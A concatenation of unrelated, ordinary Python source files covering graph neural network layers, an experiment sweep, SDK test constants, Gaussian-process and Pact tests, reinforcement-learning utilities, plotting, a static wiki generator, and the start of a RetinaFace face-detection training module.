def edge_attention(self, edges):
z2 = torch.cat([edges.src['z'], edges.dst['z']], dim=1)
a = self.attn_interacts(z2)
return {'e': torch.nn.functional.leaky_relu(a)}
def message_func(self, edges):
return {'src_z': edges.src['z'], 'e': edges.data['e'], 'dst_z': edges.dst['z']}
def reduce_func(self, nodes):
alpha = torch.nn.functional.softmax(nodes.mailbox['e'], dim=1)
n = nodes.mailbox['src_z'].shape[1]
h = (torch.mean(nodes.mailbox['dst_z'], dim=1) + n*torch.mean(alpha*(nodes.mailbox['src_z']), dim=1))/(n)
return {'ah': h}
def forward(self, graph, h0, h1):
with graph.local_scope():
# graph.srcdata['z'] = self.fcsrc(h1)
graph.srcdata['z'] = h1
graph.dstdata['z'] = self.fcdst(h0)
graph.apply_edges(self.edge_attention)
graph.update_all(self.message_func, self.reduce_func)
res = graph.ndata.pop('ah')['h0_bead']
return res"""
"""class MultiHeadMergeLayer(torch.nn.Module):
def __init__(self, in_h0_dim, in_h1_dim, out_dim, num_heads, merge='stack'):
super(MultiHeadMergeLayer, self).__init__()
self.heads = torch.nn.ModuleList()
for i in range(num_heads):
self.heads.append(MergeLayer(in_h0_dim, in_h1_dim, out_dim))
self.merge = merge
def forward(self, g, h):
head_outs = [attn_head(g, h[0], h[1]) for attn_head in self.heads]
if self.merge == 'stack':
# stack on the output feature dimension (dim=1)
return torch.stack(head_outs, dim=-1)
else:
# merge using average
return torch.mean(torch.stack(head_outs))"""
"""class decoder(torch.nn.Module):
''' num_heads, num_clusters, ntype, etype '''
def __init__(self, num_heads, num_clusters, ntype, etype):
# True: increasing, Flase: decreasing
super(decoder, self).__init__()
self.num_heads = num_heads
self.num_clusters = num_clusters
self.ntype = ntype
self.etype = etype
num_seq = num_clusters
self.w = torch.nn.Parameter(torch.empty( (self.num_heads)), requires_grad=True)
self.register_parameter('w', self.w)
torch.nn.init.uniform_(self.w, a=0.0, b=1.0)
self.r_dist = torch.nn.Parameter(torch.empty((1, num_seq)), requires_grad=True)
self.register_parameter('r_dist',self.r_dist)
torch.nn.init.uniform_(self.r_dist, a=0.2, b=0.3)
upones = torch.ones((num_seq, num_seq))
upones = torch.triu(upones)
self.upones = torch.nn.Parameter( upones, requires_grad=False)
lowones = torch.ones((num_seq, num_seq))
lowones = torch.triu(lowones, diagonal=1)
self.lowones = torch.nn.Parameter( lowones, requires_grad=False)
self.v_cluster = torch.nn.Parameter( torch.arange(num_clusters, dtype=torch.int32), requires_grad=False)
def dim2_score(self, x):
upper = self.upper_bound - x
lower = x - self.lower_bound
score = 10*(upper*lower)/(self.r_dist**2 + 1)
return score
# def dim3_score(self, x):
# upper = self.upper_bound.view(1,1,-1) - torch.unsqueeze(x, dim=-1)
# lower = torch.unsqueeze(x, dim=-1) - self.lower_bound.view(1,1,-1)
# score = (upper*lower)/(self.r_dist.view(1,1,-1)**2 + 1)
# return score
def edge_distance(self, edges):
n2 = torch.norm((edges.dst['z'] - edges.src['z']), dim=-1, keepdim=False)
weight = torch.nn.functional.softmax(self.w, dim=0)
dist = torch.sum(n2*weight, dim=-1, keepdim=True)
outputs_score = self.dim2_score(dist)
# dist = torch.mean(n2, dim=-1, keepdim=True)
# outputs_score = self.dim2_score(dist)
# score = self.dim3_score(n2)
# prob = torch.softmax(score, dim=-1)
# clusters = torch.sum(prob * self.v_cluster.view(1,1,-1), dim=-1, keepdim=False)
# mean = torch.sum(clusters*weight.view(1,-1), dim=-1, keepdim=True)
# diff = clusters - mean
# std = torch.sqrt(torch.sum(diff**2, dim=-1, keepdim=True))
std = torch.std(n2, dim=-1, unbiased=True, keepdim=False)
return {'dist_pred': outputs_score, 'std': std}
def forward(self, g, h):
with g.local_scope():
g.nodes[self.ntype].data['z'] = h
# r = 10/torch.sum(torch.abs(self.r_dist))
r = self.r_dist.clamp(min=0.1)
self.upper_bound = (torch.matmul(r, self.upones)).clamp(min=0.0, max=15.0) # *r
self.lower_bound = (torch.matmul(r, self.lowones)).clamp(min=0.01, max=15.0) # *r
g.apply_edges(self.edge_distance, etype=self.etype)
return g.edata.pop('dist_pred'), g.edata.pop('std')"""
"""class decoder(torch.nn.Module):
''' num_heads, num_clusters, ntype, etype '''
def __init__(self, num_heads, num_clusters, ntype, etype):
# True: increasing, Flase: decreasing
super(decoder, self).__init__()
self.num_heads = num_heads
self.num_clusters = num_clusters
self.ntype = ntype
self.etype = etype
num_seq = num_clusters
self.w = torch.nn.Parameter(torch.empty( (self.num_heads)), requires_grad=True)
self.register_parameter('w', self.w)
torch.nn.init.uniform_(self.w, a=-10.0, b=10.0)
self.bottom = torch.tensor(0.0, dtype=torch.float32)
self.register_buffer('bottom_const', self.bottom)
self.top = torch.tensor(10.0, dtype=torch.float32)
self.register_buffer('top_const', self.top)
self.drange = torch.linspace(self.bottom_const, 1.0, steps=num_seq-1, dtype=torch.float, requires_grad=True)
self.in_dist = torch.nn.Parameter(self.drange+0.1, requires_grad=True)
self.register_parameter('in_dist', self.in_dist)
# self.in_dist = torch.nn.Parameter( torch.eye(num_step, num_seq-1), requires_grad=True)
# # self.in_dist = torch.nn.Parameter( torch.empty((num_step, num_seq-1)), requires_grad=True)
# # torch.nn.init.uniform_(self.in_dist, a=-10.0, b=10.0)
# self.register_parameter('in_dist', self.in_dist)
mat = torch.diag( -1*torch.ones((num_seq+1)), diagonal=0) + torch.diag( torch.ones((num_seq)), diagonal=-1)
self.subtract_mat = torch.nn.Parameter(mat[:,:-1], requires_grad=False)
def dim2_score(self, x):
upper = self.upper_bound - x
lower = x - self.lower_bound
score = torch.clamp( (4.0*upper*lower)/(self.r_dist**2 + 1), min=-6.0, max=6.0)
score = (torch.nn.functional.sigmoid(score)*2.0-1)*10.0
return score
# def dim3_score(self, x):
# upper = self.upper_bound.view(1,1,-1) - torch.unsqueeze(x, dim=-1)
# lower = torch.unsqueeze(x, dim=-1) - self.lower_bound.view(1,1,-1)
# score = (4.0*upper*lower)/(self.r_dist.view(1,1,-1)**2 + 1.0)
# score = (torch.nn.functional.sigmoid(score)*2.0-1)*10.0
# return score
def edge_distance(self, edges):
n2 = torch.norm((edges.dst['z'] - edges.src['z']), dim=-1, keepdim=False)
weight = torch.nn.functional.softmax(self.w, dim=0)
# score = self.dim3_score(n2)
# outputs_score = torch.sum(score*weight.view(1,-1,1), dim=1)
dist = torch.sum(n2*weight, dim=-1, keepdim=True)
outputs_score = self.dim2_score(dist)
std, mean = torch.std_mean(n2, dim=-1, unbiased=False, keepdim=False)
return {'dist_pred': outputs_score, 'std': std/(mean+1.0)}
def forward(self, g, h):
with g.local_scope():
g.nodes[self.ntype].data['z'] = h
# sorted_in_d = self.in_dist.view(1,-1)
# dist_mat = torch.softmax(self.in_dist, dim=0)
dist = torch.square(self.in_dist) + torch.ones_like(self.in_dist)*0.01
d = torch.cumsum( dist, dim=0)
sorted_in_d = d.clamp(min=0.1, max=20.0).view(1,-1)
# sorted_in_d, _ = torch.sort( in_d, dim=-1)
self.lower_bound = torch.cat( (self.bottom_const.view(1,-1),
sorted_in_d),
dim=1)
self.upper_bound = torch.cat( (sorted_in_d,
self.top_const.view(1,-1)),
dim=1)
self.bound = torch.cat( (self.bottom_const.view(1,-1),
sorted_in_d,
self.top_const.view(1,-1)),
dim=1)
self.r_dist = torch.relu( torch.matmul(self.bound, self.subtract_mat) )
g.apply_edges(self.edge_distance, etype=self.etype)
return g.edata.pop('dist_pred'), g.edata.pop('std')"""
|
import numpy as np
from tqdm.auto import tqdm
import matplotlib.pyplot as plt
import pandas as pd
from argent.live_plot import LivePlot
class Sweep:
def __init__(self, client, x, start, stop, steps, averages=1, sweeps=1, plot=None, legend=None):
''' Run a sweep across one or more variables.
Arguments:
client: handle to argent.Client
x (str): name of independent variable to sweep
start (float): beginning of sweep
stop (float): end of sweep
steps (int): number of steps in sweep
averages (int): cycles to be repeated at each sweep point to gather statistics
sweeps (int): number of sweeps to perform
plot (str): a variable name can be passed to this argument to display a live plot
legend (list): an optional second variable to iterate over. Should be a list with two elements,
where the first is the name of the variable and the second is the set of points to try.
Example: legend=['z', (0, 1, 2, 3)]
'''
self.x = x
self.start = start
self.stop = stop
self.steps = steps
self.client = client
self.sweeps = sweeps
self.averages = averages
self.y = plot
self.dataset = self.client.dataset()
self.legend = legend
if plot is not None:
self.progress_plot = LivePlot(client, x, plot, xlim=[start, stop], legend=legend)
self.run()
def run(self):
sweep_points = np.linspace(self.start, self.stop, self.steps)
if self.y is None:
sweep_points = tqdm(sweep_points) # show progress bar is no variable is designated for plotting
if self.legend is None:
for _ in range(self.sweeps):
for point in sweep_points:
self.client.set(self.x, point)
self.client.collect(self.averages)
self.progress_plot.update()
else:
for z0 in self.legend[1]:
self.client.set(self.legend[0], z0)
for _ in range(self.sweeps):
for point in sweep_points:
self.client.set(self.x, point)
self.client.collect(self.averages)
self.progress_plot.update()
self.dataset.stop()
def save(self, filename):
self.dataset.data.to_csv(filename)
|
# resource constants
# some minor setup required to run in record mode
# - actual subsid to be used
# - rg must exist
# - vnet must exist
TEST_RG='sdk-py-tests-rg'
TEST_ACC_1='sdk-py-tests-acc-1'
TEST_ACC_2='sdk-py-tests-acc-2'
TEST_POOL_1='sdk-py-tests-pool-1'
TEST_POOL_2='sdk-py-tests-pool-2'
TEST_VOL_1='sdk-py-tests-vol-1'
TEST_VOL_2='sdk-py-tests-vol-2'
TEST_SNAPSHOT_1='sdk-py-tests-snapshot-1'
TEST_SNAPSHOT_2='sdk-py-tests-snapshot-2'
DEFAULT_SIZE=4398046511104
GIGABYTE=1024 * 1024 * 1024
SUBSID='subsid'
SERVICE_LEVEL='Premium'
LOCATION='westus2'
VNET='sdk-py-tests-rg-vnet'
SERVICE_LEVEL='Premium'
|
# helper_module.py
# -*- coding: utf8 -*-
# vim:fileencoding=utf8 ai ts=4 sts=4 et sw=4
# Copyright 2016 National Research Foundation (South African Radio Astronomy Observatory)
# BSD license - see LICENSE for details
from __future__ import absolute_import, division, print_function
from future import standard_library
standard_library.install_aliases()
import os
import sys
def get_server_name():
"""Gets the TANGO server name from the command line arguments
Returns
=======
server_name : str
tango device server name
Note
====
Extract the Tango server_name or equivalent executable
(i.e.sim_xmi_parser.py -> sim_xmi_parser or
/usr/local/bin/mkat-tango-katcpdevice2tango-DS ->
mkat-tango-katcpdevice2tango-DS) from the command line
arguments passed, where sys.argv[0] is the server executable name
and sys.argv[1] is the server instance.
"""
executable_name = os.path.split(sys.argv[0])[-1].split(".")[0]
server_name = executable_name + "/" + sys.argv[1]
return server_name
|
from urllib.parse import urlparse
#get domain name (example.com)
def get_domain_name(url):
try:
results = get_sub_domain_name(url).split('.')
return results[-2] + '.' + results[-1]
except:
return ''
#get sub domain name (name.example.com)
def get_sub_domain_name(url):
try :
#parse in using urlparse (python function) and return network location
return urlparse(url).netloc
except:
return ''
|
class Solution:
# @param matrix, a list of lists of integers
# RETURN NOTHING, MODIFY matrix IN PLACE.
def setZeroes(self, matrix):
x = len(matrix)
if x > 0:
y = len(matrix[0])
else:
y = 0
rows = [1]*x
cols = [1]*y
for i in range(x):
for j in range(y):
if matrix[i][j] == 0:
rows[i] = 0
cols[j] = 0
for i in range(x):
if rows[i] == 0:
for j in range(y):
matrix[i][j] = 0
for j in range(y):
if cols[j] == 0:
for i in range(x):
matrix[i][j] = 0
m = [[1,1,1],[0,1,2]]
s = Solution()
s.setZeroes(m)
print(m)
|
import bayesnewton
import objax
from bayesnewton.utils import inv
import numpy as np
from jax.config import config
config.update("jax_enable_x64", True)
import pytest
import tensorflow as tf
import gpflow
import scipy as sp
import pickle
gpflow.config.set_default_jitter(1e-20)
train_data = pickle.load(open(f'../experiments/shutters/data/train_data_0_0.pickle', "rb"))
pred_data = pickle.load(open(f'../experiments/shutters/data/pred_data_0_0.pickle', "rb"))
pred_data = pred_data['grid']
X = train_data['X']
Y = train_data['Y']
X_test = pred_data['X']
Y_test = pred_data['Y']
def initialise_newt_model(var_f, len_f, var_y, x, y):
r = np.unique(x[:, 1])
print(r)
kernel = bayesnewton.kernels.SpatioTemporalMatern52(variance=var_f, lengthscale_time=len_f, lengthscale_space=len_f, z=r)
likelihood = bayesnewton.likelihoods.Gaussian(variance=var_y)
model = bayesnewton.models.VariationalGP(kernel=kernel, likelihood=likelihood, X=x, Y=y)
return model
# def init_as_cvi(kern, Z_all):
# M = Z_all.shape[0]
#
# Kzz = kern(Z_all, Z_all)
#
# # def inv(K):
# # K_chol = sp.linalg.cholesky(K+1e-3*np.eye(M), lower=True)
# # return sp.linalg.cho_solve((K_chol, True), np.eye(K.shape[0]))
#
# #manual q(u) decompositin
# nat1 = np.zeros([M, 1])
# nat2 = inv(Kzz)
#
# lam1 = np.zeros([M, 1])
# lam2 = 1e-2*np.eye(M)
#
# # S = inv(-2*(nat2+lam2))
# S = inv(nat2+lam2)
# m = S @ (lam1 + nat1)
#
# S_chol = sp.linalg.cholesky(S+1e-8*np.eye(M), lower=True)
# S_flattened = S_chol[np.tril_indices(M, 0)]
#
# q_mu = m
# q_sqrt = np.array([S_chol])
# return q_mu, q_sqrt
def initialise_gpflow_model(var_f, len_f, var_y, x, y):
N = x.shape[0]
k0 = gpflow.kernels.Matern52(lengthscales=[len_f], variance=var_f, active_dims=[0], name='matern1')
k1 = gpflow.kernels.Matern52(lengthscales=[len_f], variance=1., active_dims=[1], name='matern2')
k = k0 * k1
# find the m and S that correspond to the same natural parameters used by CVI
K_xx = np.array(k(x, x))
K_xx_inv = inv(K_xx)
print(x.shape)
S = inv(K_xx_inv + 1e-2 * np.eye(N))
S_chol = np.linalg.cholesky(S)
S_chol_init = np.array([S_chol])
# S_chol_flattened_init = np.array(S_chol[np.tril_indices(N, 0)])
lambda_init = np.zeros((N, 1))
m_init = S @ lambda_init
lik = gpflow.likelihoods.Gaussian(variance=var_y)
# data = (x, y)
# print(x)
model = gpflow.models.SVGP(
inducing_variable=x,
whiten=False,
kernel=k,
mean_function=None,
likelihood=lik,
q_mu=m_init,
q_sqrt=S_chol_init
)
gpflow.utilities.set_trainable(model.inducing_variable.Z, False)
gpflow.utilities.set_trainable(model.q_mu, False)
gpflow.utilities.set_trainable(model.q_sqrt, False)
return model
@pytest.mark.parametrize('var_f', [1., 5.])
@pytest.mark.parametrize('len_f', [0.1, 0.025])
@pytest.mark.parametrize('var_y', [0.1, 0.3])
def test_initial_loss(var_f, len_f, var_y):
"""
test whether newt's VI and gpflow's SVGP (Z=X) give the same initial ELBO and posterior
"""
newt_model = initialise_newt_model(var_f, len_f, var_y, X, Y)
gpflow_model = initialise_gpflow_model(var_f, len_f, var_y, X, Y)
newt_model.update_posterior()
loss_newt = newt_model.energy()
# _, _, expected_density = newt_model.inference(newt_model)
print(loss_newt)
# print(expected_density)
data = (X, Y)
f_mean, f_var = gpflow_model.predict_f(X)
var_exp = np.sum(gpflow_model.likelihood.variational_expectations(f_mean, f_var, Y))
loss_gpflow = -gpflow_model.elbo(data)
print(loss_gpflow.numpy())
# print(var_exp)
# print(posterior_mean - f_mean[:, 0])
np.testing.assert_allclose(np.squeeze(newt_model.posterior_mean.value), f_mean[:, 0], rtol=1e-4)
np.testing.assert_allclose(np.squeeze(newt_model.posterior_variance.value), f_var[:, 0], rtol=1e-4)
np.testing.assert_almost_equal(loss_newt, loss_gpflow.numpy(), decimal=2)
@pytest.mark.parametrize('var_f', [1., 5.])
@pytest.mark.parametrize('len_f', [0.1, 0.025])
@pytest.mark.parametrize('var_y', [0.1, 0.3])
def test_gradient_step(var_f, len_f, var_y):
"""
test whether newt's VI and gpflow's SVGP (Z=X) provide the same initial gradient step in the hyperparameters
"""
# x, y = build_data(N)
newt_model = initialise_newt_model(var_f, len_f, var_y, X, Y)
gpflow_model = initialise_gpflow_model(var_f, len_f, var_y, X, Y)
gv = objax.GradValues(newt_model.energy, newt_model.vars())
lr_adam = 0.1
lr_newton = 1.
opt = objax.optimizer.Adam(newt_model.vars())
newt_model.update_posterior()
newt_grads, value = gv() # , lr=lr_newton)
loss_ = value[0]
opt(lr_adam, newt_grads)
newt_hypers = np.array([newt_model.kernel.temporal_lengthscale, newt_model.kernel.spatial_lengthscale,
newt_model.kernel.variance, newt_model.likelihood.variance])
print(newt_hypers)
print(newt_grads)
adam_opt = tf.optimizers.Adam(lr_adam)
data = (X, Y)
with tf.GradientTape() as tape:
loss = -gpflow_model.elbo(data)
_vars = gpflow_model.trainable_variables
gpflow_grads = tape.gradient(loss, _vars)
loss_fn = gpflow_model.training_loss_closure(data)
adam_vars = gpflow_model.trainable_variables
adam_opt.minimize(loss_fn, adam_vars)
gpflow_hypers = np.array([gpflow_model.kernel.lengthscales.numpy()[0],
gpflow_model.kernel.lengthscales.numpy()[1],
gpflow_model.kernel.variance.numpy(),
gpflow_model.likelihood.variance.numpy()])
print(gpflow_hypers)
print(gpflow_grads)
np.testing.assert_allclose(newt_grads[0], gpflow_grads[0], atol=1e-2) # use atol since values are so small
np.testing.assert_allclose(newt_grads[1], gpflow_grads[1], rtol=1e-2)
np.testing.assert_allclose(newt_grads[2], gpflow_grads[2], rtol=1e-2)
# @pytest.mark.parametrize('var_f', [0.5, 1.5])
# @pytest.mark.parametrize('len_f', [0.75, 2.5])
# @pytest.mark.parametrize('var_y', [0.1, 0.5])
# def test_inference_step(var_f, len_f, var_y):
# """
# test whether newt's VI and gpflow's SVGP (Z=X) give the same posterior after one natural gradient step
# """
#
# # x, y = build_data(N)
#
# newt_model = initialise_newt_model(var_f, len_f, var_y, X, Y)
# gpflow_model = initialise_gpflow_model(var_f, len_f, var_y, X, Y)
#
# lr_newton = 1.
#
# newt_model.update_posterior()
# newt_loss = inf(newt_model, lr=lr_newton) # update variational params
# newt_model.update_posterior()
#
# data = (X, Y[:, None)
# with tf.GradientTape() as tape:
# loss = -gpflow_model.elbo(data)
#
# variational_vars = [(gpflow_model.q_mu, gpflow_model.q_sqrt)]
# natgrad_opt = gpflow.optimizers.NaturalGradient(gamma=lr_newton)
# loss_fn = gpflow_model.training_loss_closure(data)
# natgrad_opt.minimize(loss_fn, variational_vars)
#
# f_mean, f_var = gpflow_model.predict_f(X)
#
# # print(post_mean_)
# # print(f_mean[:, 0])
#
# np.testing.assert_allclose(np.squeeze(newt_model.posterior_mean.value), f_mean[:, 0], rtol=1e-3)
# np.testing.assert_allclose(np.squeeze(newt_model.posterior_variance.value), f_var[:, 0], rtol=1e-3)
var_f = 1
len_f = 1
var_y = 0.1
newt_model = initialise_newt_model(var_f, len_f, var_y, X, Y)
gpflow_model = initialise_gpflow_model(var_f, len_f, var_y, X, Y)
newt_model.update_posterior()
loss_newt = newt_model.energy()
# _, _, expected_density = newt_model.inference(newt_model)
print(loss_newt)
# print(expected_density)
data = (X, Y)
f_mean, f_var = gpflow_model.predict_f(X)
var_exp = np.sum(gpflow_model.likelihood.variational_expectations(f_mean, f_var, Y))
loss_gpflow = -gpflow_model.elbo(data)
print(loss_gpflow.numpy())
# print(var_exp)
# print(posterior_mean - f_mean[:, 0])
# np.testing.assert_allclose(np.squeeze(newt_model.posterior_mean.value), f_mean[:, 0], rtol=1e-4)
# np.testing.assert_allclose(np.squeeze(newt_model.posterior_variance.value), f_var[:, 0], rtol=1e-4)
# np.testing.assert_almost_equal(loss_newt, loss_gpflow.numpy(), decimal=2)
|
#!/usr/bin/env python3
import atexit
import requests
from pact import Consumer, Provider
pact = Consumer('sandwich-maker').has_pact_with(Provider('Butterer'))
pact.start_service()
atexit.register(pact.stop_service)
PACT_BASE_URL = 'http://localhost:1234'
BREAD_AND_BUTTER = 'bread and butter'
def test_buttering():
(pact
.given('We want to butter bread')
.upon_receiving('a request to butter bread')
.with_request('get', '/butter/bread')
.will_respond_with(200, body=BREAD_AND_BUTTER))
with pact:
result = requests.get(f'{PACT_BASE_URL}/butter/bread')
assert result.text == 'bread and butter'
def test_buttering_twice():
(pact
.given('We want to butter bread again')
.upon_receiving('a request to butter buttered bread')
.with_request('get', '/butter/bread%20and%20butter')
.will_respond_with(200, body=BREAD_AND_BUTTER))
with pact:
result = requests.get(f'{PACT_BASE_URL}/butter/bread%20and%20butter')
assert result.text == 'bread and butter'
|
import os
import torch
import torch.nn.functional as F
import torch.distributed as dist
from torch.autograd import Variable
import numpy as np
import json
import cv2
CONFIG_PATH = os.getcwd()+'/../assets/config.ymal'
def within_bound(p,shape,r=0):
""" check if point p [y;x] or [y;x;theta] with radius r is inside world of shape (h,w)
return bool if p is single point | return bool matrix (vector) if p: [y;x] where y & x are matrix (vector) """
return (p[0] >= r) & (p[0] < shape[0]-r) & (p[1] >= r) & (p[1] < shape[1]-r)
# https://github.com/ikostrikov/pytorch-ddpg-naf/blob/master/ddpg.py#L11
def soft_update(target, source, tau):
"""
Perform DDPG soft update (move target params toward source based on weight
factor tau)
Inputs:
target (torch.nn.Module): Net to copy parameters to
source (torch.nn.Module): Net whose parameters to copy
tau (float, 0 < x < 1): Weight factor for update
"""
for target_param, param in zip(target.parameters(), source.parameters()):
target_param.data.copy_(target_param.data * (1.0 - tau) + param.data * tau)
# https://github.com/ikostrikov/pytorch-ddpg-naf/blob/master/ddpg.py#L15
def hard_update(target, source):
"""
Copy network parameters from source to target
Inputs:
target (torch.nn.Module): Net to copy parameters to
source (torch.nn.Module): Net whose parameters to copy
"""
for target_param, param in zip(target.parameters(), source.parameters()):
target_param.data.copy_(param.data)
# https://github.com/seba-1511/dist_tuto.pth/blob/gh-pages/train_dist.py
def average_gradients(model):
""" Gradient averaging. """
size = float(dist.get_world_size())
for param in model.parameters():
dist.all_reduce(param.grad.data, op=dist.reduce_op.SUM, group=0)
param.grad.data /= size
# https://github.com/seba-1511/dist_tuto.pth/blob/gh-pages/train_dist.py
def init_processes(rank, size, fn, backend='gloo'):
""" Initialize the distributed environment. """
os.environ['MASTER_ADDR'] = '127.0.0.1'
os.environ['MASTER_PORT'] = '29500'
dist.init_process_group(backend, rank=rank, world_size=size)
fn(rank, size)
def onehot_from_action(actions):
onehot = np.zeros((len(actions),8))
for i,action in enumerate(actions):
onehot[i,action] = 1
return onehot
def onehot_from_logits(logits, eps=0.0):
"""
Given batch of logits, return one-hot sample using epsilon greedy strategy
(based on given epsilon)
"""
# get best (according to current policy) actions in one-hot form
argmax_acs = (logits == logits.max(1, keepdim=True)[0]).float()
if eps == 0.0:
return argmax_acs
# get random actions in one-hot form
rand_acs = Variable(torch.eye(logits.shape[1])[[np.random.choice(
range(logits.shape[1]), size=logits.shape[0])]], requires_grad=False)
# chooses between best and random actions using epsilon greedy
return torch.stack([argmax_acs[i] if r > eps else rand_acs[i] for i, r in
enumerate(torch.rand(logits.shape[0]))])
# modified for PyTorch from https://github.com/ericjang/gumbel-softmax/blob/master/Categorical%20VAE.ipynb
def sample_gumbel(shape, eps=1e-20, tens_type=torch.FloatTensor):
"""Sample from Gumbel(0, 1)"""
U = Variable(tens_type(*shape).uniform_(), requires_grad=False)
return -torch.log(-torch.log(U + eps) + eps)
# modified for PyTorch from https://github.com/ericjang/gumbel-softmax/blob/master/Categorical%20VAE.ipynb
def gumbel_softmax_sample(logits, temperature):
""" Draw a sample from the Gumbel-Softmax distribution"""
y = logits + sample_gumbel(logits.shape, tens_type=type(logits.data))
return F.softmax(y / temperature, dim=1)
# modified for PyTorch from https://github.com/ericjang/gumbel-softmax/blob/master/Categorical%20VAE.ipynb
def gumbel_softmax(logits, temperature=1.0, hard=False):
"""Sample from the Gumbel-Softmax distribution and optionally discretize.
Args:
logits: [batch_size, n_class] unnormalized log-probs
temperature: non-negative scalar
hard: if True, take argmax, but differentiate w.r.t. soft sample y
Returns:
[batch_size, n_class] sample from the Gumbel-Softmax distribution.
If hard=True, then the returned sample will be one-hot, otherwise it will
be a probabilitiy distribution that sums to 1 across classes
"""
y = gumbel_softmax_sample(logits, temperature)
if hard:
y_hard = onehot_from_logits(y)
y = (y_hard - y).detach() + y
return y
def draw_map(file_name, json_path, save_path):
"""
generate map picture of the "file_name.json", and save it into save_path
:param file_name:
:param json_path:
:param save_path:
:return: None
"""
meter2pixel = 100
border_pad = 25
print("Processing ", file_name)
with open(json_path + '/' + file_name + '.json') as json_file:
json_data = json.load(json_file)
# Draw the contour
verts = (np.array(json_data['verts']) * meter2pixel).astype(np.int)
x_max, x_min, y_max, y_min = np.max(verts[:, 0]), np.min(verts[:, 0]), np.max(verts[:, 1]), np.min(verts[:, 1])
cnt_map = np.zeros((y_max - y_min + border_pad * 2,
x_max - x_min + border_pad * 2))
verts[:, 0] = verts[:, 0] - x_min + border_pad
verts[:, 1] = verts[:, 1] - y_min + border_pad
cv2.drawContours(cnt_map, [verts], 0, 255, -1)
# Save map
if not os.path.exists(save_path):
os.mkdir(save_path)
cv2.imwrite(save_path + "/" + file_name + '.png', cnt_map)
def draw_maps(map_ids, json_path, save_path):
json_path = os.path.join(os.getcwd(),json_path)
save_path = os.path.join(os.getcwd(),save_path)
for map_id in map_ids:
draw_map(map_id,json_path,save_path)
print('Draw the map successfully.')
|
from plotly.offline import plot
from plotly.graph_objs import Figure, Scatter, Marker, Line
import plotly.graph_objs as go
all_ranks = []
frequent_ranks = [] # for elements occurring at least twice
frequencies = []
rankfrequ = []
words = []
rank = 1
with open('frequencies.dat', "r") as ins:
for line in ins: # (2190,the)
line = line.strip()
pair = line.split(',')
frequency = int(pair[0][1:]) # remove (
word = pair[1][0:-1] # remove )
all_ranks.append(rank)
frequencies.append(frequency)
if frequency > 1:
frequent_ranks.append(rank)
rank_frequ = rank * frequency
rankfrequ.append(rank_frequ)
words.append(word)
rank += 1
rank_frequ = go.Scatter(
x=all_ranks,
y=frequencies,
mode='lines+markers',
name='rank_frequencies',
text=words,
textposition='top center',
)
rank_frequ2 = go.Scatter(
x=frequent_ranks,
y=rankfrequ,
mode='lines+markers',
name='rank_frequencies',
text=words,
textposition='top center',
)
rank_frequ_data2 = [rank_frequ2]
# rank_frequ_data2 = [rank_frequ, rank_frequ2]
fig2 = Figure(data=rank_frequ_data2)
plot(fig2, filename='rankfrequ_plot.html')
|
import os, frontmatter, markdown, configparser
from jinja2 import Environment, FileSystemLoader, contextfilter, Markup
def markdownfilter(val):
return Markup(markdown.markdown(val))
env = Environment(loader=FileSystemLoader("./templates/"))
env.filters["markdown"]=markdownfilter
config = configparser.ConfigParser()
config.read("config.ini")
assert "neowiki" in config.sections(),"Invalid config file: must have neowiki section"
config = config["neowiki"]
assert "published_path" in config,"Invalid config file: must have published_path directive under neowiki section"
pubdir = config["published_path"]
assert "contributors" in config,"Invalid config file: must have contributors list under neowiki section"
contributors = config["contributors"].split(",")
temp = env.get_template("article.html")
if not os.path.exists("build"):
os.system("mkdir build; cp -r assets/* build")
articles = os.listdir("articles")
articles = [[os.path.splitext(x)[0],frontmatter.load("articles/"+x)] for x in articles]
articles.sort(key=lambda x: x[1]["title"])
for article in articles:
if article[1]["published"]:
with open("build/"+article[0]+".html","w") as f:
f.write(temp.render(article=article[1],filename=article[0],pubdir=pubdir))
with open("build/index.html","w") as f:
f.write(env.get_template("mainpage.html").render(articles=articles,pubdir=pubdir))
with open("build/contributors.html","w") as f:
f.write(env.get_template("contributors.html").render(contributors=contributors))
|
"""
Define the modelseed variable.
"""
import os
import sys
"""
This has now been abstracted into PyFBA.__init__.py to avoid redundancy
MODELSEED_DIR = ""
if os.path.exists('Biochemistry/ModelSEEDDatabase'):
MODELSEED_DIR = 'Biochemistry/ModelSEEDDatabase'
elif 'ModelSEEDDatabase' in os.environ:
MODELSEED_DIR = os.environ['ModelSEEDDatabase']
else:
sys.stderr.write("Please ensure that you install the Model SEED Database somewhere, and set the environment " +
"variable ModelSEEDDatabase to point to that directory.\n" +
" See INSTALLATION.md for more information\n")
sys.exit(-1)
if not MODELSEED_DIR:
sys.stderr.write("The ModelSEEDDatabase environment variable is not set.\n")
sys.stderr.write("Please install the ModelSEEDDatabase, set the variable, and try again")
sys.exit(-1)
if not os.path.exists(MODELSEED_DIR):
sys.stderr.write("The MODEL SEED directory: {} does not exist.\n".format(MODELSEED_DIR))
sys.stderr.write("Please check your installation.\n")
sys.exit(-1)
sys.stderr.write(f"We are using {MODELSEED_DIR} for our data\n")
"""
|
import argparse
from collections import OrderedDict
from pathlib import Path
from typing import List, Dict, Any
import apex
import numpy as np
import pytorch_lightning as pl
import torch
import torch.nn.functional as F
import yaml
from albumentations.core.serialization import from_dict
from iglovikov_helper_functions.config_parsing.utils import object_from_dict
from iglovikov_helper_functions.metrics.map import recall_precision
from pytorch_lightning.logging import WandbLogger
from torch.utils.data import DataLoader
from torchvision.ops import nms
from retinaface.box_utils import decode
from retinaface.data_augment import Preproc
from retinaface.dataset import FaceDetectionDataset, detection_collate
def get_args():
parser = argparse.ArgumentParser()
arg = parser.add_argument
arg("-c", "--config_path", type=Path, help="Path to the config.", required=True)
return parser.parse_args()
class RetinaFace(pl.LightningModule):
def __init__(self, hparams: Dict[str, Any]):
super().__init__()
self.hparams = hparams
self.model = object_from_dict(self.hparams["model"])
if hparams["sync_bn"]:
self.model = apex.parallel.convert_syncbn_model(self.model)
self.loss_weights = self.hparams["loss_weights"]
self.priors = object_from_dict(self.hparams["prior_box"], image_size=self.hparams["image_size"])
self.loss = object_from_dict(self.hparams["loss"], priors=self.priors)
def setup(self, state=0):
self.preproc = Preproc(img_dim=self.hparams["image_size"][0])
def forward(self, batch: torch.Tensor) -> torch.Tensor:
return self.model(batch)
def train_dataloader(self):
return DataLoader(
FaceDetectionDataset(
label_path=self.hparams["train_annotation_path"],
image_path=self.hparams["train_image_path"],
transform=from_dict(self.hparams["train_aug"]),
preproc=self.preproc,
),
batch_size=self.hparams["train_parameters"]["batch_size"],
num_workers=self.hparams["num_workers"],
shuffle=True,
pin_memory=True,
drop_last=False,
collate_fn=detection_collate,
)
def val_dataloader(self):
return DataLoader(
